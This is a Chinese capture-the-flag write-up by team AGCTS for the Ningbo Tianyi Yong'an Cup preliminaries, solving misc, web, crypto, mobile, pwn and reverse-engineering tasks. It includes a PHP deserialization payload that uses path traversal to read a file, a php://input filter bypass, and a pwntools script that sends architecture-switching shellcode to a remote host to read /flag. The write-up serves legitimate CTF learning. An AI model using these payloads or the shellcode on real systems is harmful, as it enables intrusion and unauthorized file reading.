宁波天一永安杯初赛 wp-AGCTS战队

文章目录

  • MISC
    • Zip
    • SimpleDocument
    • BeautifulImage
  • Web
    • Deserialization
    • CodeCheck
  • Crypto
    • Secret
    • Rsa
  • Mobile
    • Peacock
  • pwn
    • wingtip
  • RE
    • Polenta

MISC

Zip

ARCHPR 直接数字爆破,得到二进制密码,得 flag

宁波天一永安杯初赛 wp-AGCTS战队_第1张图片

SimpleDocument

Kali binwalk 发现里面有一 pdf 文件,foremost 分离,在线网站 pdf 解密

PDF转换为文本 - 迅捷,在线,免费 - PDF24 Tools

宁波天一永安杯初赛 wp-AGCTS战队_第2张图片

BeautifulImage

Kali zsteg 有一串 base64 字符串,直接解密得到 flag

宁波天一永安杯初赛 wp-AGCTS战队_第3张图片

宁波天一永安杯初赛 wp-AGCTS战队_第4张图片

Web

Deserialization

发现代码,首先读取 route.php 的内容。

宁波天一永安杯初赛 wp-AGCTS战队_第5张图片

宁波天一永安杯初赛 wp-AGCTS战队_第6张图片

继续读取 h1nt.php 的代码。

宁波天一永安杯初赛 wp-AGCTS战队_第7张图片

宁波天一永安杯初赛 wp-AGCTS战队_第8张图片

在$input2 = clone $input 可跳入到__clone 函数,即可读取文件。 Paylaod: read=h1nt.php&input=O:4:“test”:1:{s:8:“position”;s:33:“…/…/…/…/var/www/html/f14g.php”;}

宁波天一永安杯初赛 wp-AGCTS战队_第9张图片

在源码里可以看到 flag。

宁波天一永安杯初赛 wp-AGCTS战队_第10张图片

CodeCheck

源码里发现代码,直接利用 php://input 绕过 if 语句,然后读取 index.php 得到 flag。

宁波天一永安杯初赛 wp-AGCTS战队_第11张图片

Crypto

Secret

简单的 rsa,和之前郑州轻工业大学校赛的一样,不过这里的 e=28,所以要进行四次转换。 脚本如下:

from gmpy2 import *
import libnum
e=28
p=1342611187967895478514784070906400740222141326820004301363837959819428848530
008261711899061028663230440783489334190385437193619233206949749706004264507558
458392359491673919879703308360047683607746764249585549466997675821055562391774
50470656065560178592346659948800891455240736405480828554486592172443394370831
q=1478474445341521289975469316022922660947408893471541924205549046518133409157
443281041000653732943467239643567364367099348717411613282869441502427334455422
282930364046575561688447235218158366893871848568710910254348967106056885948474
00051686361372872763001355411405782508020591933546964183881743133374126947753
c=1391339636675501060704347755257726827792824131910121538166233149804608062590
283120248664602076756892188118512489496024286725416292760541622846010839908740
698925803701763961919550671109001287745413138356883275060610290111078204552926
794050447132284736480809479066269678547059489224471613720378189028421687403548
630250604226345325558047538074295920131400378855369297791435799698211832858711
912414418129075338939414923538104538969684147148394731066332999387304612313458
714966134799977495810509110380637570238708414930954235154102114011104840824812
1408401601979108510758891595550054699719801708646232427198902271953673874
a=invert(e//4,(p-1)*(q-1))
b=pow(c,a,p*q)
c=iroot(b,4)[0]
print(c)
print(libnum.n2s(int(c)))

运行后得到 flag。

Rsa

本题直接把 a 给了,直接写脚本:

from gmpy2 import *
import libnum
n=3653555884708271990120156103118183534657457661095071392492427294775919357636
581776298092763869169660129308953731505541374678819020887523479422911904905629
955186486987029163494124636243649100690434755955949470592225900729912664081727
5929491680601926404543198957206717290905220235571289759182878331893962038379
c=5329978729404522821890434300080027936947884398224653025322087542310057990579
72378308576109082463996551992533174546386979606697890310597738637156771564229
a=2694858406312563434474553988904403597551484373358339092528913028454100111881
368126493990657117571672510331411186745639563619323775673115439
e = 65537
d = invert(e,a-1)
x=pow(c,d,a)
print(libnum.n2s(int(x)))

宁波天一永安杯初赛 wp-AGCTS战队_第12张图片

Mobile

Peacock

Apk 后缀改为 zip 解压 lib 文件中随便拉个 so 进 ida shif+F12

image-20230622121635091

看到这两行推测 base64 转码表直接跑脚本

import base64
a = 
list("AB+/abcdefg0123456789OPQRSTUVWXYZCDEFGhijklmnopqrst
uvwxyzHIJKLMN")
b = ''.join(a) 
c = 
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123
456789+/'
s = 
'ShsCSyoDREau3/5zSh9v3caw18RH2hat3PeHSEeySh6C2PRwSQv='
c = str.maketrans(b, c)
print(base64.b64decode(s.translate(c)))

pwn

wingtip

程序为 64 位,采用 32 位的系统调用完成逃逸脚本如下:

a1 = "flag{04977e9482f9c16040da8b52a5ea3e35}"
print(len(a1))
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
#p=process("./pwn1")
p=remote("node.nsctf.cn",57981)
shellcode=asm("""
 mov rsp,0x101000;
""")
shellcode+=asm(shellcraft.amd64_to_i386())
context.clear()
context.update(arch="i386")
shellcode+=asm(shellcraft.cat("/flag"))
p.send(shellcode)
p.interactive()

运行得 flag。

宁波天一永安杯初赛 wp-AGCTS战队_第13张图片

RE

Polenta

Ida 打开

宁波天一永安杯初赛 wp-AGCTS战队_第14张图片

看起来像 tea 加密 ,网上 copy 脚本

(2条消息) C语言实现TEA系列加解密算法_P1umH0的博客-CSDN博客

Main 函数稍作修改,直接套用 btea 解密

#include 
#include 
#define DELTA 0x9e3779b9
#define MX (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) +
(key[(p & 3) ^ e] ^ z)))
void btea(uint32_t* v, int n, uint32_t const key[4])
{
uint32_t y, z, sum;
unsigned p, rounds, e;
//加密
if (n > 1)
{
rounds = 6 + 52 / n;
sum = 0;
z = v[n - 1];
do
{
sum -= 0x61C88647;
if (sum >> 31 == 0) {
sum ^= 0x9876543;
}
e = (sum >> 2) & 3;
for (p = 0; p < n - 1; p++)
{
y = v[p + 1];
z = v[p] += MX;
}
y = v[0];
z = v[n - 1] += MX;
} while (--rounds);
}
//解密
else if (n < -1)
{
n = -n;
rounds = 6 + 52 / n;
sum = 0xc6d01432;
y = v[0];
do
{
e = (sum >> 2) & 3;
for (p = n - 1; p > 0; p--)
{
z = v[p - 1];
y = v[p] -= MX;
}
z = v[n - 1];
y = v[0] -= MX;
if (sum >> 31 == 0) {
sum ^= 0x9876543;
}
sum += 0x61C88647;
} while (--rounds);
}
printf("sum==0x%x\n", sum);
}
int main()
{
uint32_t v[] =
{ 0x9e43b891,0xa937eaf1,0xddc46c84,0x713ddfda,0xe0072e3e,0xc8ad42c1,0xa
79faced,0x951dae4e,0xe7d0ab88,0x1365466d };
uint32_t k[4] = { 0x12345678, 0x90ABCDEF, 0xDEADBEEF, 0x87654321 };
int n = sizeof(v) / sizeof(uint32_t);
btea(v, -n, k);
for (int i = 0; i < n; i++)
{
for (int j = 0; j < sizeof(uint32_t) / sizeof(uint8_t); j++)
{
printf("%c", (v[i] >> (j * 8)) & 0xFF);
}
}
return 0;
}

运行得 flag:flag{04977e9482f9c16040da8b52a5ea3e35}

你可能感兴趣的:(比赛,php,安全)